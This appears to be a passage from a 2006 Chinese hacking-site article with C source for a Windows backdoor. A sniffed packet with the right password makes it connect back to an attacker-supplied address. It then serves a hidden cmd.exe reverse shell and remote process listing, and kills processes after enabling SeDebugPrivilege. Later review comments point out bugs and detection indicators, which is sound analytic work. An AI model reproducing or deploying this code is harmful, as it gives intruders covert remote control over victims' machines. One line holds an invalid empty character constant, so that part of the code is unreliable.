简单的无驱动嗅探启动后门
作者:未知    文章来源:CnXHacker.Net    点击数:    更新时间:2006-11-15    
is " );
LogToFile( shellArgument.ip );
LogToFile( "\nDecodeTCP: Remote port is " );
LogToFile( shellArgument.port );
LogToFile( "\n" );
#endif

if( strcmp( PASSWORD, password ) == 0 )
{
#ifdef DEBUG
LogToFile( "DecodeTCP: password is right\n" );
#endif

threadHandle = CreateThread( NULL,
0,
(LPTHREAD_START_ROUTINE)StartDoor,
&shellArgument,
0,
&threadID );

Sleep( 500 );
if( threadHandle == NULL )
{
#ifdef DEBUG
char tmp[512] = { 0 };
sprintf( tmp, "DecodeTCP: Create thread to make shell error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

#ifdef DEBUG
LogToFile( "DecodeTCP: Create thread to make shell successful\n" );
#endif

threadID ++;
if( threadID > 20000 )
{
threadID = 1;
}

CloseHandle( threadHandle );
return 1;
}
else
{
#ifdef DEBUG
LogToFile( "DecodeTCP: password is wrong\n" );
#endif

return -1;
}
}

///////////////////////////////////////////////////////////////////////////////
//后门模块
///////////////////////////////////////////////////////////////////////////////

/*
 * StartDoor - thread body for one backdoor session (started from DecodeTCP
 * through CreateThread once the password check has passed).
 *
 * argument  pointer to a SHELL_ARGUMENT whose ip and port members are
 *           strings; this thread connects OUT to that address (reverse
 *           connection), so on the host the session appears as an outbound
 *           TCP connection initiated by this process.
 * Returns -1 if socket() or connect() fails, 0 when the command loop ends
 * (client sent "exit" or isRunning was cleared).
 *
 * Command loop: send the FLAG prompt, read one command, dispatch on its
 * prefix - "exit", "shell" (StartShell), "pslist" (ListProcess),
 * "kill <pid>" (KillProcess).
 *
 * NOTE(review): DecodeTCP passes &shellArgument and then only Sleep(500)s
 * before returning; if that object is a stack local of DecodeTCP, this
 * thread is reading it after its lifetime may have ended - confirm against
 * the declaration, which is outside this excerpt.
 */
int StartDoor( LPVOID argument )
{
SOCKET sock;
SOCKADDR_IN sin;
int ret;
WSADATA wsaData; // declared but never used here; no WSAStartup() in this function, presumably done elsewhere - confirm
SHELL_ARGUMENT *shellArgument = (SHELL_ARGUMENT *)argument;

#ifdef DEBUG
LogToFile( "StartDoor: I'm in door now\n" );
#endif

sock = socket( AF_INET, SOCK_STREAM, 0 );
if ( sock == INVALID_SOCKET )
{
#ifdef DEBUG
char tmp[512] = { 0 };
sprintf( tmp, "StartDoor: Create socket error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

memset( &sin, 0, sizeof(sin) );

// Destination taken verbatim from the argument: port via atoi(), address via inet_addr().
// Neither value is validated.
sin.sin_family = AF_INET;
sin.sin_port = htons( atoi(shellArgument->port) );
sin.sin_addr.s_addr = inet_addr( shellArgument->ip );

// Outbound (reverse) connection to the peer-supplied address.
ret = connect( sock, (struct sockaddr *)&sin, sizeof(sin) );
if( ret == SOCKET_ERROR )
{
#ifdef DEBUG
char tmp[512] = { 0 };
sprintf( tmp, "StartDoor: Connect error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

char cmd[256] = { 0 }; // command received from the client

while( TRUE )
{
// leave the loop once the service has been stopped
if( !isRunning )
{
break;
}

ZeroMemory( cmd, sizeof(cmd) );

// send the command prompt FLAG (the original comment names it "Icy\>")
strcpy( cmd, FLAG );
send( sock, cmd, strlen(cmd), 0 );

// receive the client's command; at most sizeof(cmd)-1 bytes, so cmd stays NUL-terminated.
// NOTE(review): the recv() result is ignored - on a closed peer (0) or SOCKET_ERROR, cmd stays
// all zero, none of the prefixes below match, and the loop keeps going until isRunning is cleared.
ZeroMemory( cmd, sizeof(cmd) );
recv( sock, cmd, sizeof(cmd)-1, 0 );

// exit command
if( StartWith( cmd, "exit\n" ) )
{
send( sock, "ByeBye...\n", strlen("ByeBye...\n"), 0 );
break;
}

// client requests an interactive shell
if( StartWith( cmd, "shell" ) )
{
StartShell( sock );
}

// list processes
if( StartWith( cmd, "pslist" ) )
{
ListProcess( sock );
}

// kill a process; cmd + sizeof("kill ")-1 points at the process ID
if( StartWith( cmd, "kill" ) )
{
char pID[7] = { 0 }; // up to 6 characters plus terminator; pID is zero-filled, so strncpy() cannot leave it unterminated
strncpy( pID, cmd + sizeof("kill ") - 1, 6 );

// NOTE(review): '' is an empty character constant and is not valid C; the '\0' was most likely
// lost when the page was rendered - TODO confirm against the original source. strchr() also
// returns NULL when the copied text contains no '\n', and that NULL is dereferenced unchecked.
*( strchr( pID, '\n' ) ) = '';

KillProcess( sock, pID );
}
}

closesocket( sock );
return 0;
}

//Interactive shell: cmd.exe bridged to the socket through two anonymous pipes.
/*
 * StartShell - spawn a hidden cmd.exe with its standard handles redirected to
 * two anonymous pipes and relay bytes between those pipes and sock.
 *
 * sock    connected socket to the remote client (owned by the caller; not
 *         closed here).
 * Returns 0 in all cases.
 *
 * Data flow: pipe1 carries cmd.exe stdout/stderr -> sock; pipe2 carries
 * sock -> cmd.exe stdin. The loop ends when isRunning is cleared, a pipe
 * read/write fails, send()/recv() fails, or the client sends a chunk that
 * begins with "exit"; cmd.exe is then terminated.
 *
 * Review notes on the code as written:
 * - ret from both CreatePipe() calls and from CreateProcess() is assigned but
 *   never tested, so a failed spawn still enters the relay loop.
 * - processInfo.hProcess and processInfo.hThread are never closed.
 * - bytesRead is unsigned long; "bytesRead <= 0" after recv() therefore only
 *   detects 0, and a SOCKET_ERROR (-1) result is forwarded to WriteFile() as
 *   a very large length.
 *
 * Detection view: a process that creates cmd.exe with STARTF_USESTDHANDLES,
 * SW_HIDE and inheritable pipe handles while holding an outbound TCP
 * connection is the textbook reverse-shell shape.
 */
int StartShell( SOCKET sock )
{
SECURITY_ATTRIBUTES sa;

// inheritable handles so the child process can use the pipe ends
sa.nLength = sizeof( sa );
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = TRUE;

HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;

int ret;

// create the pipes (results stored in ret but not tested)
ret=CreatePipe( &hReadPipe1, &hWritePipe1, &sa, 0 );
ret=CreatePipe( &hReadPipe2, &hWritePipe2, &sa, 0 );

STARTUPINFO si;
ZeroMemory( &si, sizeof(si) );

GetStartupInfo( &si );

// redirect the new process's standard handles: stdin from pipe2, stdout/stderr into pipe1; window hidden
si.cb = sizeof( si );
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;

PROCESS_INFORMATION processInfo;

char cmdLine[] = "cmd.exe";

// create the process; bInheritHandles = 1 so the pipe handles above are passed to the child
ZeroMemory( &processInfo , sizeof(PROCESS_INFORMATION) );
ret = CreateProcess(NULL, cmdLine, NULL,NULL,1,0,NULL,NULL,&si,&processInfo);

char buff[BUFFER_SIZE] = { 0 };
unsigned long bytesRead = 0;
int i = 0;

while( TRUE )
{
if( !isRunning ) break;

memset( buff, 0, BUFFER_SIZE );

// non-blocking check for pending output from cmd.exe
ret = PeekNamedPipe( hReadPipe1, buff, BUFFER_SIZE, &bytesRead, 0, 0 );

// poll up to 5 x 100 ms so slow output is not missed before falling through to recv()
for(i = 0; i < 5 && bytesRead == 0; i++)
{
Sleep(100);
ret = PeekNamedPipe( hReadPipe1, buff, BUFFER_SIZE, &bytesRead, NULL, NULL );
}

if( bytesRead )
{
// child output -> client
ret = ReadFile( hReadPipe1, buff, bytesRead, &bytesRead, 0 );
if( !ret ) break;

ret = send( sock, buff, bytesRead, 0 );
if( ret <= 0 ) break;
}
else
{
// no child output pending: wait for the client and feed its bytes to cmd.exe stdin
bytesRead = recv( sock, buff, BUFFER_SIZE, 0 );

if( bytesRead <= 0 ) break; // only catches 0: bytesRead is unsigned, see header note

if( StartWith( buff , "exit" ) == TRUE ) break;

ret = WriteFile( hWritePipe2, buff, bytesRead, &bytesRead, 0 );
if( !ret ) break;
}
}

// kill the cmd.exe process and close the pipe handles
TerminateProcess( processInfo.hProcess, 0 );

CloseHandle( hReadPipe1 );
CloseHandle( hReadPipe2 );
CloseHandle( hWritePipe1 );
CloseHandle( hWritePipe2 );

return 0;
}

//Send a "PID\t\tProcessName" table of all running processes to the client.
/*
 * ListProcess - enumerate processes with the Toolhelp32 snapshot API and
 * write one "<pid>\t\t<exe>\n" line per process to sock.
 *
 * sock    connected socket to the remote client.
 * Returns -1 if the snapshot cannot be taken or Process32First() fails,
 * 0 otherwise.
 *
 * Review notes:
 * - hProcessSnap is closed on the Process32First() failure path but not on
 *   the normal return, so the snapshot handle leaks on every successful call.
 * - hProcess is declared and never used.
 * - th32ProcessID is a DWORD; "%d" does not match it ("%lu" would).
 * - send() results are not checked.
 */
int ListProcess( SOCKET sock )
{
HANDLE hProcessSnap = NULL;
HANDLE hProcess = NULL; // unused
PROCESSENTRY32 pe32;
char psBuff[BUFFER_SIZE] = { 0 }; // one output line; must hold a PID plus szExeFile - confirm BUFFER_SIZE is large enough

hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Call CreateToolhelp32Snapshot error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

// dwSize must be set before the first Process32First() call
pe32.dwSize = sizeof( PROCESSENTRY32 );

if( !Process32First( hProcessSnap, &pe32 ) )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Call Process32First error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

CloseHandle( hProcessSnap );

return -1;
}

send( sock, "PID\t\tProcessName\n", strlen("PID\t\tProcessName\n"), 0 );

// one line per process; Process32Next() returns FALSE once the snapshot is exhausted
do
{
ZeroMemory( psBuff , sizeof(psBuff) );
sprintf( psBuff , "%d\t\t%s\n", pe32.th32ProcessID , pe32.szExeFile );

send( sock, psBuff, strlen(psBuff), 0 );
}
while( Process32Next( hProcessSnap, &pe32 ) );

// NOTE(review): no CloseHandle( hProcessSnap ) on this path
return 0;
}

//Terminate the process whose ID the client supplied.
/*
 * KillProcess - enable SeDebugPrivilege on this process's token, then open
 * the target process with PROCESS_TERMINATE and terminate it, reporting each
 * step back over sock as text.
 *
 * sock    connected socket to the remote client.
 * pID     process ID as a decimal string taken from the client's command;
 *         converted with atoi() and not validated (non-numeric input maps
 *         to PID 0).
 * Returns -1 when the token cannot be opened, the privilege LUID cannot be
 * looked up, OpenProcess() fails, or TerminateProcess() fails; 1 on success.
 *
 * Review notes:
 * - The result of AdjustTokenPrivileges() is not checked, so whether
 *   SeDebugPrivilege was actually enabled is unknown at the point of use.
 * - The exit code handed to TerminateProcess() is (DWORD)-1.
 *
 * Detection view: a process enabling SeDebugPrivilege and then calling
 * OpenProcess(PROCESS_TERMINATE)/TerminateProcess() on PIDs received over the
 * network is a strong host-based indicator.
 */
int KillProcess( SOCKET sock, char *pID )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

// open our own token for privilege adjustment
if ( !OpenProcessToken( GetCurrentProcess() , TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY , &hToken ) )
{
send( sock, "Open Process Token Failed\n", strlen("Open Process Token Failed\n"), 0 );
return -1;
}

// resolve the LUID for SE_DEBUG_NAME ("SeDebugPrivilege")
if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
{
send( sock, "Set Privileg Failed\n", strlen("Set Privileg Failed\n"), 0 );
CloseHandle( hToken );

return -1;
}

// request the privilege enabled on the current token (result unchecked)
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL );

CloseHandle( hToken );

HANDLE hProcess = NULL;

// echo the target PID back to the client
send( sock, "try to kill ", strlen("try to kill "), 0 );
send( sock, pID, strlen(pID), 0 );
send( sock, "\n", strlen("\n"), 0 );

// OpenProcess() returns NULL on failure; INVALID_HANDLE_VALUE is tested as well
hProcess = OpenProcess( PROCESS_TERMINATE , FALSE , atoi(pID) );
if( hProcess ==INVALID_HANDLE_VALUE || hProcess == NULL )
{
char err[56] = { 0 }; // "Open Process Failed: " + at most 11 digits + "\n" fits comfortably
sprintf( err, "Open Process Failed: %d\n", GetLastError() );
send( sock, err, strlen(err), 0 );

return -1;
}
if ( !TerminateProcess( hProcess, (DWORD) -1 ) )
{
send( sock, "Terminate Process Failed\n", strlen("Terminate Process Failed\n"), 0 );
CloseHandle( hProcess );

return -1;
}

send( sock, "process killed\n", strlen("process killed\n"), 0 );
CloseHandle( hProcess );

return 1;
}

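//Return TRUE when buf1 begins with buf2.
/*
 * StartWith - prefix test.
 *
 * buf1    NUL-terminated string to examine.
 * buf2    NUL-terminated prefix to look for.
 * Returns TRUE if the first strlen(buf2) characters of buf1 equal buf2,
 * FALSE otherwise.
 *
 * strncmp() stops at the first NUL in either string, so a buf1 that is
 * shorter than buf2 is simply reported as "no match"; the original memcmp()
 * kept reading past buf1's terminator in that case (an out-of-bounds read).
 * Because buf2 contains no NUL within its first strlen(buf2) bytes, the
 * result is otherwise identical to the memcmp() version.
 */
BOOL StartWith( char *buf1, char *buf2 )
{
	size_t len = strlen( buf2 );

	return strncmp( buf1, buf2, len ) == 0 ? TRUE : FALSE;
}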
